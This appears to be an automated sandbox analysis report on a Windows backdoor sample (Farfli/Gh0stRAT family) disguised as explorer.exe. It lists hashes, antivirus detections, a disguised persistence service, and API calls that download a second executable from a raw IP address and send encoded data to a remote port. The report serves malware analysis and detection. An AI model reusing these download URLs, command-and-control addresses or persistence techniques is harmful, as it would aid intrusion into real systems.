Summary | ZeroBOX

explorer.exe

PE32 PE File
Category  Machine        Started                 Completed
FILE      s1_win7_x6402  May 4, 2021, 9:09 a.m.  May 4, 2021, 9:11 a.m.
Size 400.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 01c087629a99a6cb94700ae1f8f4d894
SHA256 ed5646b78d8d18ee534bb54d9708f5881d075c38d8f46dfa7e4c4a0783b01e27
CRC32 F8EFED45
ssdeep 1536:siRtp/YdUQtzqeCNNzwft8dJHHRP+QAhYd13afFM1c7EHChiH0hLP+VVVVVVVVVQ:sAAdrt4Ot6dpgxfFMa7EHbH0hLNZ
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
106.52.15.123 Active Moloch
172.217.25.14 Active Moloch
62.234.113.47 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

Status 1  Return 1  Repeated 0
packer Armadillo v1.71
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 13295898624
free_bytes_available: 13295898624
root_path: C:\
total_number_of_bytes: 34252779520
Status 1  Return 1  Repeated 0
name RT_ICON language LANG_CHINESE filetype GLS_BINARY_LSB_FIRST sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x0006367c size 0x00000468
name RT_MENU language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063ae4 size 0x0000004a
name RT_DIALOG language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063b30 size 0x000000ee
name RT_STRING language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063c20 size 0x00000054
name RT_ACCELERATOR language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063c74 size 0x00000010
name RT_GROUP_ICON language LANG_CHINESE filetype data sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00063d20 size 0x00000014
file C:\Program Files\Windows NT\system.exe
Time & API Arguments Status Return Repeated

CreateServiceA

service_start_name:
start_type: 2
password:
display_name: SSDKSRV Discovery Service
filepath: C:\Windows\ApplicationFrameHost.exe
service_name: Rsyqqw gwewweyc
filepath_r: C:\Windows\ApplicationFrameHost.exe
desired_access: 983551
service_handle: 0x005212c8
error_control: 1
service_type: 272
service_manager_handle: 0x00521250
Status 1  Return 5378760  Repeated 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2208
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 45056
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
Status 1  Return 0  Repeated 0
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x000003fc
process_name: Host.exe
process_identifier: 7078000
0 0
host 106.52.15.123
host 172.217.25.14
host 62.234.113.47
service_name: Rsyqqw gwewweyc
service_path: C:\Windows\ApplicationFrameHost.exe
Time & API Arguments Status Return Repeated

connect

ip_address: 106.52.15.123
socket: 692
port: 80
4294967295 0

send

buffer: !
socket: 600
sent: 1
Status 1  Return 1  Repeated 0

URLDownloadToFileW

url: http://106.52.15.123/system.exe
stack_pivoted: 0
filepath_r: C:\Program Files\Windows NT\system.exe
filepath: C:\Program Files\Windows NT\system.exe
2148270085 0

connect

ip_address: 62.234.113.47
socket: 848
port: 8003
Status 1  Return 0  Repeated 0

send

buffer: “dqdGA\*ÆR,Q.Þ¦Vd’e“’PP-NCºÑ=se”ice>Nack>QPž/^/3¹ŸP.PQ-.U-.R-/-QQ,.
socket: 848
sent: 574
Status 1  Return 574  Repeated 0
dead_host 106.52.15.123:80
Bkav W32.AIDetect.malware1
Elastic malicious (high confidence)
DrWeb Trojan.MulDrop16.43224
MicroWorld-eScan DeepScan:Generic.Rincux2.3C4478C2
FireEye Generic.mg.01c087629a99a6cb
ALYac DeepScan:Generic.Rincux2.3C4478C2
Cylance Unsafe
Sangfor Trojan.Win32.Farfli.DSK
K7AntiVirus Riskware ( 0040eff71 )
Alibaba Backdoor:Win32/Farfli.45eb63e0
K7GW Riskware ( 0040eff71 )
Cybereason malicious.29a99a
Arcabit DeepScan:Generic.Rincux2.3C4478C2
BitDefenderTheta Gen:NN.ZexaF.34686.zqW@aSaiSPgb
Cyren W32/Trojan.BYFY-6213
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/GenKryptik.FCQT
APEX Malicious
Avast Win32:Malware-gen
ClamAV Win.Dropper.Gh0stRAT-8026915-0
Kaspersky HEUR:Backdoor.Win32.Farfli.gen
BitDefender DeepScan:Generic.Rincux2.3C4478C2
NANO-Antivirus Trojan.Win32.Farfli.iudwcf
Paloalto generic.ml
Ad-Aware DeepScan:Generic.Rincux2.3C4478C2
Sophos Mal/Generic-R + Mal/FakeAV-KL
Comodo TrojWare.Win32.Magania.F@7jjkv4
VIPRE Trojan.Win32.Generic!BT
McAfee-GW-Edition RDN/Generic BackDoor
Emsisoft DeepScan:Generic.Rincux2.3C4478C2 (B)
SentinelOne Static AI - Suspicious PE
Jiangmin Trojan.Generic.wfzk
Avira TR/AD.Farfli.ljbcq
MAX malware (ai score=100)
Kingsoft Win32.Hack.Undef.(kcloud)
Gridinsoft Trojan.Win32.Kryptik.vb
Microsoft Trojan:Win32/Farfli.DSK!MTB
ZoneAlarm HEUR:Backdoor.Win32.Farfli.gen
GData DeepScan:Generic.Rincux2.3C4478C2
Cynet Malicious (score: 100)
AhnLab-V3 Backdoor/Win32.RL_Zegost.R361328
McAfee RDN/Generic BackDoor
VBA32 Trojan.Farfli
Malwarebytes Generic.Trojan.Malicious.DDS
TrendMicro-HouseCall TROJ_GEN.R03AC0DDD21
Rising Trojan.Kryptik!1.D241 (CLOUD)
Yandex Trojan.GenAsa!UgP2HmBuAUY
Ikarus Trojan.Win32.Krypt
eGambit Unsafe.AI_Score_99%
Fortinet W32/Farfli.FCQT!tr.bdr